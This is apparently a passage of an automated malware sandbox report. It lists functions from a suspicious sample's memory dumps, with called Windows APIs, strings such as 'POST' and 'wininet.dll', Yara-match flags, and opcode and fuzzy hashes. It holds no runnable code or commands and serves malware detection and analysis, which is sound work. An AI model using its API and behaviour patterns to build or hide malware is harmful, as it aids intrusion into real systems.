                                                    • Instruction ID: 9af778ec2b93712aa67ba281b740745620137e59b69e5335f065f48c99fa7529
                                                    • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                    • Instruction Fuzzy Hash: EFD012762002146BD714EB98CC45F97776CEF44750F154455BA1C5B242C570F51086E0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B89860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 2fc888eef69cd3dba42a02dc1414e88c304ed08b76a2f581c2e07d0b2f59088e
                                                    • Instruction ID: eb152ee873dc947f55f46d0474efecda0d4a8a1b433c1c4e0795f1d56954bb09
                                                    • Opcode Fuzzy Hash: 2fc888eef69cd3dba42a02dc1414e88c304ed08b76a2f581c2e07d0b2f59088e
                                                    • Instruction Fuzzy Hash: 3C90027220100413F511615A4604707045DD7D0285F91C466A0415558D9696DD62B171
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B89840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: e61ce7ff0bc88f7e929ea92e11484b70e15a8bd83ffbc43abe3eab1aed3d8272
                                                    • Instruction ID: 296c88dc0c4eacbeac66afd9df9e84464bd9c37c63f75de398db0530877f86a1
                                                    • Opcode Fuzzy Hash: e61ce7ff0bc88f7e929ea92e11484b70e15a8bd83ffbc43abe3eab1aed3d8272
                                                    • Instruction Fuzzy Hash: 25900262242041527945B15A4504507445AE7E0285791C066A1405950C8566EC66E671
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B899A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 2463e4b8d689988069c4595826b6898defa70562bb6716619d2a3fbbf03f3ed5
                                                    • Instruction ID: dfce2ecbe0c012eda7f69cda9a094885a91a7f879a73de3652e6b78c21cb9e6d
                                                    • Opcode Fuzzy Hash: 2463e4b8d689988069c4595826b6898defa70562bb6716619d2a3fbbf03f3ed5
                                                    • Instruction Fuzzy Hash: D59002A234100442F500615A4514B060459D7E1345F51C069E1055554D8659DC627176
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B895D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 0cd9c648d8f14b9cf0586ddfc7d88c4358099cd142459463e82b8e9e55171e93
                                                    • Instruction ID: 66200831e7a575257a1542bd2b1943478173bb26c7f1d6f18d64f615373692c7
                                                    • Opcode Fuzzy Hash: 0cd9c648d8f14b9cf0586ddfc7d88c4358099cd142459463e82b8e9e55171e93
                                                    • Instruction Fuzzy Hash: C69002A2202000036505715A4514616445ED7E0245B51C075E1005590DC565DCA17175
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B89910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 0ab6c7d1d487b8fc98e363089c8032a03a3e88dca121158da4e70213f40ff86a
                                                    • Instruction ID: 192a994ce0f6d330dc5af4fe0ee4251b73471935f49a2bf3ec51fc0cb3712562
                                                    • Opcode Fuzzy Hash: 0ab6c7d1d487b8fc98e363089c8032a03a3e88dca121158da4e70213f40ff86a
                                                    • Instruction Fuzzy Hash: 5E9002B220100402F540715A45047460459D7D0345F51C065A5055554E8699DDE576B5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B89540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 6c468c686b5b1b2928ca7f51c0e40cc44d0053ee454a96bb13c0cc9f97a16f63
                                                    • Instruction ID: 87397e1685087f90b291851b6e7d1057aff999c5adb6cdecbfb446f6f5a0c8f6
                                                    • Opcode Fuzzy Hash: 6c468c686b5b1b2928ca7f51c0e40cc44d0053ee454a96bb13c0cc9f97a16f63
                                                    • Instruction Fuzzy Hash: 25900266211000032505A55A0704507049AD7D5395351C075F1006550CD661DC716171
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B896E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: c151bbbf9004b2634a99f02c5497e070a74f77d0ada6a3046dd13590de3a849f
                                                    • Instruction ID: f32bea5dfde407129ccb9c6055a06f7231e359f97cecf7c249c0970d376d1f00
                                                    • Opcode Fuzzy Hash: c151bbbf9004b2634a99f02c5497e070a74f77d0ada6a3046dd13590de3a849f
                                                    • Instruction Fuzzy Hash: A990027220108802F510615A850474A0459D7D0345F55C465A4415658D86D5DCA17171
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B896D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: a3b341e14a260504368e7a6045335eb982b85293bda3aaa4ca5c7ba9dc27385a
                                                    • Instruction ID: 4015f2ed31d67dd3e1216fd07a87cc3a61362d74ed12313d94abd6f319c4640a
                                                    • Opcode Fuzzy Hash: a3b341e14a260504368e7a6045335eb982b85293bda3aaa4ca5c7ba9dc27385a
                                                    • Instruction Fuzzy Hash: 3C90027220100842F500615A4504B460459D7E0345F51C06AA0115654D8655DC617571
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B89660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: e70ff48cb216a78ed1f93bda73b2ae9117b749e6c3bebc16e555180df979200a
                                                    • Instruction ID: 576dd9d4823d4ace7068832c7892e7f6fd0f9ad57edded516e2d698db2478adf
                                                    • Opcode Fuzzy Hash: e70ff48cb216a78ed1f93bda73b2ae9117b749e6c3bebc16e555180df979200a
                                                    • Instruction Fuzzy Hash: 6390027220100802F580715A450464A0459D7D1345F91C069A0016654DCA55DE6977F1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B89650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 6fc059886fe4ac1880b2c3e62781fd1f94dca3c0d2f61f03a9df9b06e7577bed
                                                    • Instruction ID: 9e53034c34ada95c6dfadbea84d0e74fd6e0dfb8f1673d3be92096a4a9c69a49
                                                    • Opcode Fuzzy Hash: 6fc059886fe4ac1880b2c3e62781fd1f94dca3c0d2f61f03a9df9b06e7577bed
                                                    • Instruction Fuzzy Hash: D390027220504842F540715A4504A460469D7D0349F51C065A0055694D9665DD65B6B1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B89A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: c56d47bc99d57cfbe8cdc19a0afe66298be1600879464f402d63641e9945a7d4
                                                    • Instruction ID: f658baf27c8a7a69fb42007c30cc3d5f77cf07ae0bc4dbf1f1be0fd27435378e
                                                    • Opcode Fuzzy Hash: c56d47bc99d57cfbe8cdc19a0afe66298be1600879464f402d63641e9945a7d4
                                                    • Instruction Fuzzy Hash: 5D90026221180042F600656A4D14B070459D7D0347F51C169A0145554CC955DC716571
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B89780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 47bae03c4158e3904a23e492356aa57d52043c529c37b62440bee6b5ddb44bc9
                                                    • Instruction ID: baeb943958ba2cc24294d6455425d88b34eaec7aea459f6f139923f8ed32931d
                                                    • Opcode Fuzzy Hash: 47bae03c4158e3904a23e492356aa57d52043c529c37b62440bee6b5ddb44bc9
                                                    • Instruction Fuzzy Hash: 0F90026A21300002F580715A550860A0459D7D1246F91D469A0006558CC955DC796371
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B89FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: b0f468422150c3a881d5348db40a0673daa1ee92e50bd3cdba4943b6d5bd142c
                                                    • Instruction ID: 125d2ec09afd2b532be1258da1d20565d193dde7bb1a063a1c5e5a260d2149ce
                                                    • Opcode Fuzzy Hash: b0f468422150c3a881d5348db40a0673daa1ee92e50bd3cdba4943b6d5bd142c
                                                    • Instruction Fuzzy Hash: C090027231114402F510615A85047060459D7D1245F51C465A0815558D86D5DCA17172
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B89710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 6376e4d3bcb006ede81125a2e83f628dc34b2e1114e1022a660b36eb0c9be04f
                                                    • Instruction ID: 8685245e321a6b4cbbc2f1ceb92c8164123efaa7e35a0ddbb4b39d1748897e39
                                                    • Opcode Fuzzy Hash: 6376e4d3bcb006ede81125a2e83f628dc34b2e1114e1022a660b36eb0c9be04f
                                                    • Instruction Fuzzy Hash: 9590027220100402F500659A55086460459D7E0345F51D065A5015555EC6A5DCA17171
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 009772E6, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 108sleepCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Sleep.KERNELBASE(000007D0), ref: 00977398
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, Offset: 00960000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Sleep
                                                    • String ID: POST$net.dll$wininet.dll
                                                    • API String ID: 3472027048-3140911592
                                                    • Opcode ID: e3cbe03982b9d9fb56d371da2d46f9d0840c2c1e6732f0d3354970f0ebb84795
                                                    • Instruction ID: 7fb92444a26debc6bcfd2283f790b3602d3c79d43a83360ab773b68a657ccb9b
                                                    • Opcode Fuzzy Hash: e3cbe03982b9d9fb56d371da2d46f9d0840c2c1e6732f0d3354970f0ebb84795
                                                    • Instruction Fuzzy Hash: B731F272605304ABD711EFA8D891BABBBA8AF84300F00C16DF91D9B242D774A955CBE1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 009772F0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Sleep.KERNELBASE(000007D0), ref: 00977398
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, Offset: 00960000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Sleep
                                                    • String ID: net.dll$wininet.dll
                                                    • API String ID: 3472027048-1269752229
                                                    • Opcode ID: 07ca20ed886b21929a181dee8c3b680b364f6bf98b2b5354337f51c473f3e6aa
                                                    • Instruction ID: bcb05b10b65f4d2dcca0e6be88384c0fc67bb7895ca617f6b31f636065446660
                                                    • Opcode Fuzzy Hash: 07ca20ed886b21929a181dee8c3b680b364f6bf98b2b5354337f51c473f3e6aa
                                                    • Instruction Fuzzy Hash: 13318EB6605704ABC711DFA4D8A1FABB7B8AB88700F00C51DF61E9B241D774A546CBE1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 009788D2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00963B93), ref: 0097890D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, Offset: 00960000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FreeHeap
                                                    • String ID: .z`
                                                    • API String ID: 3298025750-1441809116
                                                    • Opcode ID: 746555e4b215e68f6e48511bb99a48f351f475705b2496969b2b2755e672d878
                                                    • Instruction ID: c44da9bd08a4487ad72564e29e6fdf7465e157f21eb55ac4a0aae6c4554e2146
                                                    • Opcode Fuzzy Hash: 746555e4b215e68f6e48511bb99a48f351f475705b2496969b2b2755e672d878
                                                    • Instruction Fuzzy Hash: 4BF0A9B2240604AFCB04CF28CC44EE737ADEF89320F144219B91ECB282C230E9018AB0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 009788E0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00963B93), ref: 0097890D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, Offset: 00960000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FreeHeap
                                                    • String ID: .z`
                                                    • API String ID: 3298025750-1441809116
                                                    • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                    • Instruction ID: 26adeefc7e7d76e293624fa32b03d7e8adf3c0508802ecfbe583c561832c735f
                                                    • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                    • Instruction Fuzzy Hash: 93E012B2200208ABDB18EF99CC49EA777ACEF88750F018558BE085B242C630E910CAB0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00967270, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 009672CA
                                                    • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 009672EB
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, Offset: 00960000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MessagePostThread
                                                    • String ID:
                                                    • API String ID: 1836367815-0
                                                    • Opcode ID: f900fcda8f6669b1d0c8376568bef9b361ab5ffbce75bdd02eeca6d8b53874f7
                                                    • Instruction ID: 63456924a935cd8c3b65506050eb7f614f01dae928cc676e903aa91ca65acba7
                                                    • Opcode Fuzzy Hash: f900fcda8f6669b1d0c8376568bef9b361ab5ffbce75bdd02eeca6d8b53874f7
                                                    • Instruction Fuzzy Hash: 4001A732A8022877E720A6949C03FBE776C5F80B51F154115FF08BA1C1E6A4690546F6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00978912, Relevance: 1.6, APIs: 1, Instructions: 63processCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 009789A4
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, Offset: 00960000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateInternalProcess
                                                    • String ID:
                                                    • API String ID: 2186235152-0
                                                    • Opcode ID: 17e6059b1bb115b20227641a58b52744b4dc87b382939dd152d598584b84c9cf
                                                    • Instruction ID: 187b0137f539b02fe3df54db6d5439283f8f86d0e92fd1af0bd015aadc9f0d52
                                                    • Opcode Fuzzy Hash: 17e6059b1bb115b20227641a58b52744b4dc87b382939dd152d598584b84c9cf
                                                    • Instruction Fuzzy Hash: B911E3B6215208BFDB18DF98CC85EEB77A9EF8C754F158258FA4D97241C630E910CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00969B30, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00969BA2
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, Offset: 00960000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Load
                                                    • String ID:
                                                    • API String ID: 2234796835-0
                                                    • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                    • Instruction ID: 2cf1b9b036aad61db40d296b880b5ecabd50a0c67928bb5a243d69ab821143c0
                                                    • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                    • Instruction Fuzzy Hash: 18011EB6D4020DABDB10EAA4EC42F9DB3BC9B94308F108195E90C9B245F671EB54CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0097894D, Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 009789A4
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, Offset: 00960000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateInternalProcess
                                                    • String ID:
                                                    • API String ID: 2186235152-0
                                                    • Opcode ID: b370df5b9b43cc87e9264c2d2f611a5f2d360df635bfa14d54eb43822063157b
                                                    • Instruction ID: eabb78406ec9f00d233e8bcef47abee7f7376f90a221674c22b2a359b98e03a5
                                                    • Opcode Fuzzy Hash: b370df5b9b43cc87e9264c2d2f611a5f2d360df635bfa14d54eb43822063157b
                                                    • Instruction Fuzzy Hash: A501C0B2204648AFDB14CF89DC81EEB77ADAF8C750F158258FA4D97241D630E851CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00978950, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 009789A4
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, Offset: 00960000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateInternalProcess
                                                    • String ID:
                                                    • API String ID: 2186235152-0
                                                    • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                    • Instruction ID: d70d97e94f501279819e162aedf7e4711a2bc7086498373fd0c4e3adbafd9ae7
                                                    • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                    • Instruction Fuzzy Hash: 4401B2B2214108BFCB58DF89DC80EEB77ADAF8C754F158258FA0D97241C630E851CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00977420, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0096CCE0,?,?), ref: 0097745C
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, Offset: 00960000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateThread
                                                    • String ID:
                                                    • API String ID: 2422867632-0
                                                    • Opcode ID: c715afaf5ee72f4797a90bb05736108bd71666473cbd07088045a551ffb1ab32
                                                    • Instruction ID: 2e9469beea61dc526a26f72bc9b61ae8a6e1b4509b19a14691d56cbb36f8863e
                                                    • Opcode Fuzzy Hash: c715afaf5ee72f4797a90bb05736108bd71666473cbd07088045a551ffb1ab32
                                                    • Instruction Fuzzy Hash: A7E065333812143AE22065A9AC03FA7B69C9BC5B20F14802AFA0DEA2C1D995F80142A9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 009788A0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RtlAllocateHeap.NTDLL(00973526,?,00973C9F,00973C9F,?,00973526,?,?,?,?,?,00000000,00000000,?), ref: 009788CD
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, Offset: 00960000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateHeap
                                                    • String ID:
                                                    • API String ID: 1279760036-0
                                                    • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                    • Instruction ID: 43d35374006d15cd253a2228c5642b85cc225345f6d18053f3cd767a45eb6685
                                                    • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                    • Instruction Fuzzy Hash: 07E012B2200208ABDB18EF99CC45EA777ACEF88650F118558BE085B242C630F910CAB0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00978A40, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,0096CFB2,0096CFB2,?,00000000,?,?), ref: 00978A70
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, Offset: 00960000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                    • Instruction ID: 41241231223ac9d62f7fc883b870bdc316dd3e73e36cdf3873fab854fea8620d
                                                    • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                    • Instruction Fuzzy Hash: 0FE01AB12002086BDB14DF49CC85EE737ADEF88650F018154BE0C57241C930E8108BF5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0096D41A, Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetErrorMode.KERNELBASE(00008003,?,?,00967C73,?), ref: 0096D44B
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, Offset: 00960000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorMode
                                                    • String ID:
                                                    • API String ID: 2340568224-0
                                                    • Opcode ID: 0e2ba4215ddb86c5a0ea6d1cb6d10244a72310a48c1600dd42d99eda72bb6955
                                                    • Instruction ID: bf6c0924aac51bd0565ec9058becdd3d6f16d92b18720148512ba4db1c109a7c
                                                    • Opcode Fuzzy Hash: 0e2ba4215ddb86c5a0ea6d1cb6d10244a72310a48c1600dd42d99eda72bb6955
                                                    • Instruction Fuzzy Hash: 56D05B757502007BE710EE649C06F667685AF95744F594078F54CD73D3DA35D6014511
                                                    Uniqueness

